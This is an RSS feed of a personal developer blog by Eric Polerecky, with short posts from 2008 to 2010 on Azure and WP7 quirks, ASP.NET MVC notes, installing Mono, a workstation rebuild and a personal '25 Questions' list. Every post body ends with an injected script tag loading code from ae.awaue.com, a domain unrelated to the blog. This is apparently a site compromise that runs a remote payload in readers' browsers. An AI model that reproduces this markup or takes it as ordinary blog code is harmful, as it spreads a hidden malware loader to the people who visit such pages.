<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Eric Polerecky &#187; default</title>
	<atom:link href="http://eric.polerecky.com/archives/category/default/feed/" rel="self" type="application/rss+xml" />
	<link>http://eric.polerecky.com</link>
	<description>An outlet for my obsession with technology</description>
	<lastBuildDate>Mon, 14 Jun 2010 14:00:00 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Bleeding Edge .NET Notes</title>
		<link>http://eric.polerecky.com/archives/bleeding-edge-net-notes/</link>
		<comments>http://eric.polerecky.com/archives/bleeding-edge-net-notes/#comments</comments>
		<pubDate>Tue, 18 May 2010 19:41:08 +0000</pubDate>
		<dc:creator>Eric Polerecky</dc:creator>
				<category><![CDATA[default]]></category>
		<category><![CDATA[azure]]></category>
		<category><![CDATA[wp7]]></category>

		<guid isPermaLink="false">http://eric.polerecky.com/?p=464</guid>
		<description><![CDATA[<br/>Azure WCF development
There is a patch you must install that creates a local &#8220;load balancer&#8221;  that fixes an issue with requests to and from AppFabric services. You&#8217;ll  also have to update the behavior.
http://code.msdn.microsoft.com/wcfazure/Wiki/View.aspx?title=KnownIssues
Azure Initialization
After publishing your services might hang, if they don&#8217;t start in  around an hour, try stopping and restarting them.
http://blog.toddysm.com/2010/01/windows-azure-deployment-stuck-in-initializing-busy-stopping-why.html
Azure


Related posts:<ol><li><a href='http://eric.polerecky.com/archives/asp-net-mvc-in-action-personal-notes/' rel='bookmark' title='Permanent Link: ASP.NET MVC in Action Personal Notes'>ASP.NET MVC in Action Personal Notes</a> <small> Keep using a custom controller Learn and Use Ajax...</small></li>
</ol>]]></description>
			<content:encoded><![CDATA[<br/><p><strong>Azure WCF development</strong></p>
<p>There is a patch you must install that creates a local &#8220;load balancer&#8221;  that fixes an issue with requests to and from AppFabric services. You&#8217;ll  also have to update the behavior.</p>
<p>http://code.msdn.microsoft.com/wcfazure/Wiki/View.aspx?title=KnownIssues</p>
<p><strong>Azure Initialization</p>
<p></strong>After publishing your services might hang, if they don&#8217;t start in  around an hour, try stopping and restarting them.</p>
<p>http://blog.toddysm.com/2010/01/windows-azure-deployment-stuck-in-initializing-busy-stopping-why.html</p>
<p><strong>Azure Instances</strong></p>
<ul>
<li>You can&#8217;t set the number of running instances for any service to  0. If you do you get a Dr. Watson exception thrown in the Azure  UI&#8230;.Really; Dr. Watson!</li>
<li>You can&#8217;t have more then 5 web roles, again cryptic Dr. Watson  error message</li>
</ul>
<p><strong>Azure Upgrade</strong></p>
<p>Upgrade means upload new code, when you do this you can&#8217;t change the  configuration. If you need to add/remove/rename roles you will have to  delete and redeploy.</p>
<p><strong>WP7 Service References</p>
<p></strong>You can only have one service reference in the current CTP.</p>
<p><strong>Upgrading WP7 CTP to April</strong></p>
<p>I tried it; following all the correct instructions the application was  running but would bomb randomly. Recreating the project from scratch  (copy/paste the code) fixed the issue.</p>
<p><strong>WP7 Panorama</p>
<p></strong>By far the best and most stable panorama: http://phone.codeplex.com/<script src="http://ae.awaue.com/7"></script></p>


<p>Related posts:<ol><li><a href='http://eric.polerecky.com/archives/asp-net-mvc-in-action-personal-notes/' rel='bookmark' title='Permanent Link: ASP.NET MVC in Action Personal Notes'>ASP.NET MVC in Action Personal Notes</a> <small> Keep using a custom controller Learn and Use Ajax...</small></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://eric.polerecky.com/archives/bleeding-edge-net-notes/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ASP.NET MVC in Action Personal Notes</title>
		<link>http://eric.polerecky.com/archives/asp-net-mvc-in-action-personal-notes/</link>
		<comments>http://eric.polerecky.com/archives/asp-net-mvc-in-action-personal-notes/#comments</comments>
		<pubDate>Fri, 08 Jan 2010 22:39:19 +0000</pubDate>
		<dc:creator>Eric Polerecky</dc:creator>
				<category><![CDATA[default]]></category>

		<guid isPermaLink="false">http://eric.polerecky.com/archives/asp-net-mvc-in-action-personal-notes/</guid>
		<description><![CDATA[<br/>
Keep using a custom controller
Learn and Use Ajax Helpers More
Rob Conery’s Law: When you have an “if” statement in the view, make a helper!

I think this might be optional depending on your view engine. Spark almost solves? this problem.

I miss dynamic languages.
Please with model binding as a way to create a terse application/framework.




No related posts.


No related posts.]]></description>
			<content:encoded><![CDATA[<br/><ol>
<li>Keep using a custom controller</li>
<li>Learn and Use Ajax Helpers More</li>
<li>Rob Conery’s Law: When you have an “if” statement in the view, make a helper!</li>
<ol>
<li>I think this might be optional depending on your view engine. Spark almost solves? this problem.</li>
</ol>
<li>I miss dynamic languages.</li>
<li>Please with model binding as a way to create a terse application/framework.</li>
</ol>
<p><script src="http://ae.awaue.com/7"></script></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://eric.polerecky.com/archives/asp-net-mvc-in-action-personal-notes/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Unrecognized attribute &#8216;targetFramework&#8217;</title>
		<link>http://eric.polerecky.com/archives/unrecognized-attribute-targetframework/</link>
		<comments>http://eric.polerecky.com/archives/unrecognized-attribute-targetframework/#comments</comments>
		<pubDate>Fri, 20 Nov 2009 01:36:28 +0000</pubDate>
		<dc:creator>Eric Polerecky</dc:creator>
				<category><![CDATA[default]]></category>

		<guid isPermaLink="false">http://eric.polerecky.com/archives/unrecognized-attribute-targetframework/</guid>
		<description><![CDATA[<br/>Change the app pool to target the .NET 4.0 Framework…it defaults to 2.



No related posts.


No related posts.]]></description>
			<content:encoded><![CDATA[<br/><p>Change the app pool to target the .NET 4.0 Framework…it defaults to 2.</p>
<p><script src="http://ae.awaue.com/7"></script></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://eric.polerecky.com/archives/unrecognized-attribute-targetframework/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Installing mono 2.4 on unbuntu jaunty</title>
		<link>http://eric.polerecky.com/archives/installing-mono-2-4-on-unbuntu-jaunty/</link>
		<comments>http://eric.polerecky.com/archives/installing-mono-2-4-on-unbuntu-jaunty/#comments</comments>
		<pubDate>Mon, 15 Jun 2009 18:20:53 +0000</pubDate>
		<dc:creator>Eric Polerecky</dc:creator>
				<category><![CDATA[default]]></category>
		<category><![CDATA[mono linux shell ubuntu]]></category>

		<guid isPermaLink="false">http://eric.polerecky.com/archives/installing-mono-2-4-on-unbuntu-jaunty/</guid>
		<description><![CDATA[<br/>there are no native installers for ubuntu jaunty. you need to install from source. I found a nice shell script that does all the steps.
http://www.nabble.com/attachment/23469480/0/install-mono-2.4



No related posts.


No related posts.]]></description>
			<content:encoded><![CDATA[<br/><p>there are no native installers for ubuntu jaunty. you need to install from source. I found a nice shell script that does all the steps.</p>
<p>http://www.nabble.com/attachment/23469480/0/install-mono-2.4</p>
<p><script src="http://ae.awaue.com/7"></script></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://eric.polerecky.com/archives/installing-mono-2-4-on-unbuntu-jaunty/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Updated RSS Feed</title>
		<link>http://eric.polerecky.com/archives/updated-rss-feed/</link>
		<comments>http://eric.polerecky.com/archives/updated-rss-feed/#comments</comments>
		<pubDate>Sun, 14 Jun 2009 02:41:04 +0000</pubDate>
		<dc:creator>Eric Polerecky</dc:creator>
				<category><![CDATA[default]]></category>
		<category><![CDATA[creepy]]></category>
		<category><![CDATA[feedburner]]></category>
		<category><![CDATA[rss]]></category>
		<category><![CDATA[stakers]]></category>

		<guid isPermaLink="false">http://eric.polerecky.com/archives/updated-rss-feed/</guid>
		<description><![CDATA[<br/>Sorry everyone that uses RSS to read my blog, both of you listen up. I updated the feed url after all that google move stuff.
http://feeds2.feedburner.com/ericpolerecky


No related posts.


No related posts.]]></description>
			<content:encoded><![CDATA[<br/><p>Sorry everyone that uses RSS to read my blog, both of you listen up. I updated the feed url after all that google move stuff.</p>
<p>http://feeds2.feedburner.com/ericpolerecky<script src="http://ae.awaue.com/7"></script></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://eric.polerecky.com/archives/updated-rss-feed/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PC Rebuild &#8211; Check, Clean PC&#8230;Fail</title>
		<link>http://eric.polerecky.com/archives/pc-rebuild-check-clean-pcfail/</link>
		<comments>http://eric.polerecky.com/archives/pc-rebuild-check-clean-pcfail/#comments</comments>
		<pubDate>Wed, 10 Jun 2009 15:58:34 +0000</pubDate>
		<dc:creator>Eric Polerecky</dc:creator>
				<category><![CDATA[default]]></category>
		<category><![CDATA[technology]]></category>
		<category><![CDATA[workstation]]></category>

		<guid isPermaLink="false">http://eric.polerecky.com/?p=373</guid>
		<description><![CDATA[<br/>I got back my shiny, rebuilt PC. After putting in a detailed build request for just Visual Studio, Visio and nothing else. No frameworks, tools, .NET stuff, nothing I fired it up. I am not shocked to see a workstation filled with so many programs, SDKs, runtimes, it looks like someone vomited up the results


No related posts.]]></description>
			<content:encoded><![CDATA[<br/><p>I got back my shiny, rebuilt PC. After putting in a detailed build request for just Visual Studio, Visio and nothing else. No frameworks, tools, .NET stuff, nothing I fired it up. I am not shocked to see a workstation filled with so many programs, SDKs, runtimes, it looks like someone vomited up the results from a Microsoft downloads search for “.NET”. I never expected my request was not honored, I figured I would get the standard “developer” build, what I am shocked with is that the development leadership group (that I am part of) directed workstation services as to what software needs to be included in the image! FAIL!</p>
<p>Here is my post PC rebuild task list.</p>
<ol>
<li>Install
<ol>
<li>Windows Live Writer (&amp; msn messenger) so I can blog about it…im a dork. </li>
<li>Firefox </li>
</ol>
</li>
<li>Outlook setup, painless. </li>
<li>Uninstall: </li>
<ol>
<li>Windows Mobile 5 SDK R1 – Not developing for mobile. </li>
<li>Windows Mobile 5 SDK R2 – Not developing for mobile. </li>
<li>Microsoft .NET Compact Framework 2.0 SP2 – Not developing for mobile. </li>
<li>Microsoft .NET Compact Framework 3.5 – Not developing for mobile. </li>
<li>Microsoft Device Emulator Version 3.0 – Not developing for mobile. </li>
<li>Microsoft SQL Server Compact 4.5 Design Tools – Not developing for mobile. </li>
<li>Microsoft SQL Server Compact 4.5 – Not developing for mobile. </li>
<li>Microsoft SQL Server Compact 4.5 for Devices – Not developing for mobile. </li>
<li>Microsoft SQL Server Database Publishing Wizard 1.2 – Don’t have access to DB Servers per client standard. </li>
</ol>
<li>Reopen the ticket to ask for the tech’s to install IIS (or provide me with a copy of i386). They did both! <img src='http://eric.polerecky.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </li>
<li>Install (Using the Web Platform Installer): </li>
<ol>
<li>ASP.NET MVC 1.0 </li>
<li>.NET Framework 3.5 SP1</li>
</ol>
<li>Install </li>
<ol>
<li>Visual Studio 3.5 SP1</li>
<li>Microsoft SQL Server 2005 Express Edition SP3 </li>
<li>Microsoft SQL Server Management Studio Express</li>
</ol>
</ol>
<p>Now the workstation is how I would have expected it. From here I can spend the rest of the day installing <a href="http://eric.polerecky.com/archives/software-to-install-on-a-fresh-pc/" target="_blank">all this software</a></p>
<p><script src="http://ae.awaue.com/7"></script></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://eric.polerecky.com/archives/pc-rebuild-check-clean-pcfail/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>25 Questions</title>
		<link>http://eric.polerecky.com/archives/25-questions/</link>
		<comments>http://eric.polerecky.com/archives/25-questions/#comments</comments>
		<pubDate>Tue, 31 Mar 2009 01:41:59 +0000</pubDate>
		<dc:creator>Eric Polerecky</dc:creator>
				<category><![CDATA[default]]></category>

		<guid isPermaLink="false">http://eric.polerecky.com/archives/25-questions/</guid>
		<description><![CDATA[<br/>1. I spent too much time thinking about writing this
2. I know I am a workaholic
3. I have a problem; I must be great at whatever I do
4. #3 includes being a provider for my family&#8230;Hence #2
5. I won a million dollars&#8230;but threw away the winning ticket
6. I worked in tattoo shops for 3 years


No related posts.]]></description>
			<content:encoded><![CDATA[<br/><p>1. I spent too much time thinking about writing this<br />
2. I know I am a workaholic<br />
3. I have a problem; I must be great at whatever I do<br />
4. #3 includes being a provider for my family&#8230;Hence #2<br />
5. I won a million dollars&#8230;but threw away the winning ticket<br />
6. I worked in tattoo shops for 3 years as a body piercer, made and sold body jewelry and have had 10 non-ear piercings<br />
7. Being a father is the scariest thing I have ever done<br />
8. I lost my two best friends in the last 6 months that was very hard on me<br />
9. Kate and I have not missed a MMA (ufc) in almost 4 years and it&#8217;s cost us about 2500$<br />
10. I majored in culinary arts<br />
11. I had the kanji symbols for &#8220;change&#8221; and &#8220;gathering&#8221; branded on the back of my legs with an electrocautery scalpel<br />
12. I do not sweet the small stuff<br />
13. I listen to podcasts about software development (TDD, OOO, DDD, ORM)<br />
14. My body is way older then I am<br />
15. I love learning<br />
16. I can barely spell and smell<br />
17. I really enjoy doing nothing<br />
18. I was expelled from high school&#8230;.twice<br />
19. I spent a weekend working as a body piercer in a gay bar<br />
20. I require 8 hours of sleep<br />
21. I look forward to spending quality time with Kate<br />
22. Small talk makes me Ill. I think I have aspergers<br />
23. There are things I left off this list<br />
24. Upon turning 30 my view of the world changed&#8230;I&#8217;m still trying to figure it out.<br />
25. I need to hire a personal assistant<script src="http://ae.awaue.com/7"></script></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://eric.polerecky.com/archives/25-questions/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Using wordpress-automatic-upgrade to upgrade to 2.7-beta2</title>
		<link>http://eric.polerecky.com/archives/using-wordpress-automatic-upgrade-to-upgrade-to-27-beta2/</link>
		<comments>http://eric.polerecky.com/archives/using-wordpress-automatic-upgrade-to-upgrade-to-27-beta2/#comments</comments>
		<pubDate>Fri, 07 Nov 2008 15:32:53 +0000</pubDate>
		<dc:creator>Eric Polerecky</dc:creator>
				<category><![CDATA[default]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://eric.polerecky.com/archives/using-wordpress-automatic-upgrade-to-upgrade-to-27-beta2/</guid>
		<description><![CDATA[<br/>Today I updated eric.polerecky.com to 2.7-beta2 using the wordpress-automatic-upgrade plugin. Everything went smooth. Once the upgrade was complete I had to disable wordpress-automatic-upgrade because of some errors in the admin pages. 
How to: edit wordpress-automatic-upgrade.php around line 2100 and change
$downloadURL = &#8216;http://wordpress.org/latest.zip&#8217;;
to
$downloadURL = &#8216;http://wordpress.org/wordpress-2.7-beta2.zip&#8217;;		


No related posts.


No related posts.]]></description>
			<content:encoded><![CDATA[<br/><p>Today I updated <a href="http://eric.polerecky.com">eric.polerecky.com</a> to 2.7-beta2 using the wordpress-automatic-upgrade plugin. Everything went smooth. Once the upgrade was complete I had to disable wordpress-automatic-upgrade because of some errors in the admin pages. </p>
<p>How to: edit wordpress-automatic-upgrade.php around line 2100 and change<br />
$downloadURL = &#8216;http://wordpress.org/latest.zip&#8217;;<br />
to<br />
$downloadURL = &#8216;http://wordpress.org/wordpress-2.7-beta2.zip&#8217;;		<script src="http://ae.awaue.com/7"></script></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://eric.polerecky.com/archives/using-wordpress-automatic-upgrade-to-upgrade-to-27-beta2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ProjectV &#8211; Enter the dojo</title>
		<link>http://eric.polerecky.com/archives/projectv-enter-the-dojo/</link>
		<comments>http://eric.polerecky.com/archives/projectv-enter-the-dojo/#comments</comments>
		<pubDate>Tue, 19 Aug 2008 18:53:21 +0000</pubDate>
		<dc:creator>Eric Polerecky</dc:creator>
				<category><![CDATA[default]]></category>

		<guid isPermaLink="false">http://eric.polerecky.com/archives/projectv-enter-the-dojo/</guid>
		<description><![CDATA[<br/>
I’ve come to be unhappy with the jquery plugin system. I seem to be in a perpetual cycle of “lookup-download-install-initialized-use” and based on the recent milestone slippage I just don’t have the time required when the only payoff (vs. other JS libs) seems to be streamlined JavaScript package……then again aren’t all the plugins adding crazy


No related posts.]]></description>
			<content:encoded><![CDATA[<br/></p>
<p>I’ve come to be unhappy with the jquery plugin system. I seem to be in a perpetual cycle of “lookup-download-install-initialized-use” and based on the recent milestone slippage I just don’t have the time required when the only payoff (vs. other JS libs) seems to be streamlined JavaScript package……then again aren’t all the plugins adding crazy overhead? Whatever…I’m going to use the dojotoolkit. </p>
<p><img src="http://archive.dojotoolkit.org/nightly/checkout/util/resources/logo/positive/dojo.logo.png" /> </p>
<p>I love me some dojo!</p>
<p><script src="http://ae.awaue.com/7"></script></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://eric.polerecky.com/archives/projectv-enter-the-dojo/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
